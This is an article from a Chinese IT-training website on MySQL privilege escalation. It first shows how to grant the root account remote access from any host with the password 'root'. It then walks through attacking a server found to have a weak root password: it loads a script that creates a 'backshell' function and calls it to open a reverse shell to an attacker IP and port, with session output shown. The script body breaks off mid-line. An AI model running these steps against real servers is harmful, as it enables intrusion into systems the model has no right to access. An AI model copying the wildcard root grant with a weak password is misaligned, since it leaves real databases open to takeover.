-
数据库
站-
热门城市 全国站>
-
其他省市
-
-
400-636-0069
小标
2018-08-20
来源 :
阅读 2530
评论 0
摘要:本文主要向大家介绍了MySQL数据库之Mysql提权总结 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。
本文主要向大家介绍了MySQL数据库之Mysql提权总结 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。
mysql默认状态下是不开放对外访问功能的
1、如何设置才能允许外网访问MySQL
使用“mysql -uroot -proot”命令可以连接到本地的mysql服务;
使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库;
使用“GRANT ALL PRIVILEGES ON *.* TO ‘root‘@‘%‘ IDENTIFIED BY ‘root‘ WITH GRANT OPTION;”命令可以更改远程连接的设置;
使用“flush privileges;”命令刷新刚才修改的权限,使其生效;
使用“select host,user from user;”查看修改是否成功
2、mysql弱口令(反弹端口连接提权)
假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。
实验环境:phpStudy 默认安装的mysql数据库 5.5.40版本
C:\APMServ5\APMServ5.2.6\MySQL5.1\bin>mysql.exe -h 192.168.106.141 -u root -p
Enter password: ****
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.5.40 MySQL Community Server (GPL)
Type ‘help;‘ or ‘\h‘ for help. Type ‘\c‘ to clear the buffer.
mysql> \. c:\mysql.txt
Database changed
Query OK, 0 rows affected (0.02 sec)
Query OK, 0 rows affected (0.06 sec)
Query OK, 1 row affected (0.01 sec)
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Query OK, 1 row affected (0.00 sec)
Query OK, 0 rows affected (0.09 sec)
+-------------------------------------------------------+
| backshell(‘‘) |
+-------------------------------------------------------+
| 反弹shell.
例:select backshell("your IP",your port); |
+-------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select backshell("192.168.106.137",2010);
+-----------------------------------+
| backshell("192.168.106.137",2010) |
+-----------------------------------+
| 执行成功
|
+-----------------------------------+
1 row in set (0.02 sec)
mysql> select backshell("192.168.106.137",2010);
+-----------------------------------------+
| backshell("192.168.106.137",2010) |
+-----------------------------------------+
| 创建临时文件出错,backshell无法继续运行. |
+-----------------------------------------+
1 row in set (0.02 sec)
mysql> select @@version
-> ;
+-----------+
| @@version |
+-----------+
| 5.5.40 |
+-----------+
1 row in set (0.00 sec)
mysql>
mysql.txt:
use mysql;
set @a=concat(‘‘,
本文由职坐标整理并发布,希望对同学们学习MySQL有所帮助,更多内容请关注职坐标数据库MySQL数据库频道!
喜欢 | 0
不喜欢 | 1
您输入的评论内容中包含违禁敏感词
我知道了
请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号
索取资料
答疑解惑
技术交流
职业测评
面试技巧
高薪秘笈
